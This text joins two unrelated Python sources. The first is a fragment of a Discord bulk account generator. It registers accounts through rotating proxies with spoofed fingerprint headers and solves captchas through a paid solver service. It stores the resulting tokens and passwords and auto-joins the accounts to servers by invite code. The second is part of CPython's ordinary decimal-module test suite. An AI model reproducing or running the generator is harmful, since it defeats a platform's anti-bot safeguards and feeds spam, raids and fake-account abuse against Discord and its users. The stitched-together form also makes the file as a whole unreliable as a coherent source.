alphabet = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
uuidlength = 32
uuid = ""
for i in range(uuidlength):
uuid = uuid + alphabet[random.randrange(len(alphabet))]
return uuid
def sunucuya_sok(token, davet_kodlari):
for davet_linki in davet_kodlari:
param = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.301 Chrome/56.0.2924.87 Discord/1.6.15 Safari/537.36",
"authority": "discordapp.com",
"method": "POST",
"path": f"/api/v6/invite/{davet_linki}",
"scheme": "https",
"accept": "*/*",
"accept-encoding": "gzip, deflate",
"accept-language": "en-US",
"authorization": token,
"content-length": "0",
"origin": "https://discordapp.com",
"referer": "http://discordapp.com/channels/@me"
}
source = requests.post(
f"https://discordapp.com/api/v6/invite/{davet_linki}", headers=param)
def get_info(token):
r = requests.get("https://discord.com/api/v8/users/@me",
headers={"Authorization": f"{token}"}, verify=False)
return r.json()
def register(email, username, password, proxy, conf):
headers = get_headers()
genericHeaders = getGenericHeader()
os, browser, headers['user-agent'], browserver, osvers = getInfo()
genericHeaders['user-agent'] = headers['user-agent']
s = requests.Session()
if proxy != None:
proxies = {
'http': 'http://' + proxy,
'https': 'https://' + proxy
}
s.proxies.update(proxies)
fingerprint_json = s.get("https://discordapp.com/api/v6/experiments",
timeout=conf['timeout'], headers=headers, verify=False).text
fingerprint = json.loads(fingerprint_json)["fingerprint"]
debug("Finger print: " + fingerprint, conf)
xsuperprop = base64.b64encode(json.dumps(getSuperProp(
os, browser, headers['user-agent'], browserver, osvers, 36127), separators=",:").encode()).decode()
debug("X-Super-Properties: " + xsuperprop, conf)
time.sleep(conf['sleepdelay'])
headers['X-Super-Properties'] = xsuperprop
headers['X-Fingerprint'] = fingerprint
payload = {
'fingerprint': fingerprint,
'email': email,
'username': username,
'password': password,
'invite': None,
'captcha_key': None,
'consent': True,
"date_of_birth": "1997-04-24",
'gift_code_sku_id': None
}
uuid = generateUUID()
#print("first registration post "+email+":"+username+":"+password, conf)
messages = f'{Fore.LIGHTRED_EX}--------------------{Fore.RESET}\nMail: {email}\nUsername: {username}\nPassword: {password}\n{Fore.LIGHTRED_EX}--------------------{Fore.RESET}'
print(messages)
response = s.post('https://discordapp.com/api/v6/auth/register',
json=payload, headers=headers, timeout=conf['timeout'], verify=False)
time.sleep(conf['sleepdelay'])
captchaRequired = False
if 'captcha-required' in response.text:
print("Captcha is required to verify user.")
captchaRequired = True
if 'You are being rate limited.' in response.text:
print("You are being rate limited.")
return False
if 'Email is already registered.' in response.text:
print("Already registered")
return False
if 'Please update Discord to continue.' in response.text:
print("Please update Discord to continue.")
return False
if 'response-already-used-error' in response.text:
print("Captcha response already used once. Returning.")
return False
if captchaRequired:
if conf['skip_if_captcha']:
return False
ss = requests.Session()
time.sleep(conf['sleepdelay'])
debug("fetching captcha", conf)
API_KEY = conf["captchakey"]
site_key = conf["sitekey"]
discord_url_s = 'https://discordapp.com/api/v6/auth/register'
captcha_id = ss.get("http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(
API_KEY, site_key, discord_url_s)).text.split('|')[1]
recaptcha_answer = ss.get(
"http://2captcha.com/res.php?key={}&action=get&id={}".format(API_KEY, captcha_id)).text
        #print(f"{Fore.CYAN}Solving captcha...")
while 'CAPCHA_NOT_READY' in recaptcha_answer:
time.sleep(5)
recaptcha_answer = ss.get(
"http://2captcha.com/res.php?key={}&action=get&id={}".format(API_KEY, captcha_id)).text
recaptcha_answer = recaptcha_answer.split('|')[1]
debug("Result: "+recaptcha_answer, conf)
payload['captcha_key'] = recaptcha_answer
debug("sending payload: "+str(payload), conf)
time.sleep(conf['sleepdelay'])
response = s.post('https://discordapp.com/api/v6/auth/register',
json=payload, headers=headers, timeout=conf['timeout'], verify=False)
debug(response.json(), conf)
token = response.json()['token']
file = open('token_gen.txt', 'a')
file.writelines(token + '\n')
file.close()
try:
_info = get_info(token)
_id = _info['id']
_discriminator = _info['discriminator']
file2 = open('accounts.txt', 'a')
_datam = f"\nMail: {email}\nUsername: {username}\nDiscriminator: {_discriminator}\nID: {_id}\nPassword: {password}\nToken: {token}\n\n\n"
file2.writelines(_datam)
file2.close()
except:
pass
print(f'{Fore.CYAN}Account Generated\n{Fore.LIGHTRED_EX}--------------------{Fore.RESET}\n{Fore.CYAN}Mail: {Fore.LIGHTGREEN_EX}{email}\n{Fore.CYAN}Username: {Fore.LIGHTGREEN_EX}{username}#{_discriminator}\n{Fore.CYAN}Token: {Fore.LIGHTGREEN_EX}{token}\n{Fore.LIGHTRED_EX}--------------------{Fore.RESET}')
davet_kodlari = conf["invite_codes"]
davet_kodlari = davet_kodlari.split(',')
sunucuya_sok(token, davet_kodlari)
return True
if 'unauthorize' in response.text:
debug('unauthorized', conf)
return False
def worker(conf):
debug("worker started", conf)
proxy = None
if conf['use_proxies']:
proxies_used_file = conf['usedproxies']
try:
proxies_used = open(proxies_used_file).read()
except:
proxies_used = ''
proxy = proxies_q.get()
proxies_q.task_done()
while proxies_used.count(proxy) > 2 and not proxies_q.empty():
proxy = proxies_q.get()
proxies_q.task_done()
open(proxies_used_file, 'a').write(proxy+'\n')
if conf["username"] == 'random':
username = turkce_isimler.rastgele_isim_al()
elif conf["username"] == "file":
_file = conf["usernames"]
username = random_nick(_file)[0]
else:
        # If many accounts are opened with the same username, the available discriminator tags run out; append random characters next to the username here, e.g. [ {get_random_string(3)} ], to avoid this.
username = f'{conf["username"]}'
password = f'{conf["password"]}'
email = f'{get_random_string(7)}@gmail.com'
try:
if not register(email, username, password, proxy, conf):
print("Fail")
worker(conf)
else:
print("Successfully made a account.")
open(proxies_used_file, 'a').write(proxy+'\n')
worker(conf)
except:
worker(conf)
pass
def runIt(conf):
tx = []
debug("Starting "+str(conf['nb_threads'])+" threads", conf)
for i in range(conf['nb_threads']):
mT = threading.Thread(target=worker, args=(conf, ))
mT.daemon = True
mT.start()
tx.append(mT)
for t in tx:
t.join(75)
def main():
global proxies_q
global predefinedNames
conf = read_configurations()
proxies = [x.rstrip() for x in open(conf['proxy_file'], 'r').readlines()]
proxies_q = array_to_queue(proxies, proxies_q)
debug("Starting "+str(conf['nb_threads'])+" threads", conf)
while 1:
runIt(conf)
main()
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import inspect
import threading
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
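# fractions[C] holds a fractions module built against the C implementation of
# decimal, and fractions[P] one built against the pure-Python implementation;
# tests pick the matching module via fractions[self.decimal] so that
# Fraction/Decimal comparisons exercise the flavour under test.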
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
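# For example, an operation that overflows typically also signals Inexact and
# Rounded; since Overflow appears later in the list than Inexact and Rounded,
# a cumulative-trap check (see eval_equation below) expects the Overflow trap
# to fire first.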
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
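# When EXTENDEDERRORTEST is enabled, eval_equation() re-runs each operation
# with every expected signal trapped one at a time (and then cumulatively, in
# precedence order) and asserts that the corresponding exception is raised.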
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
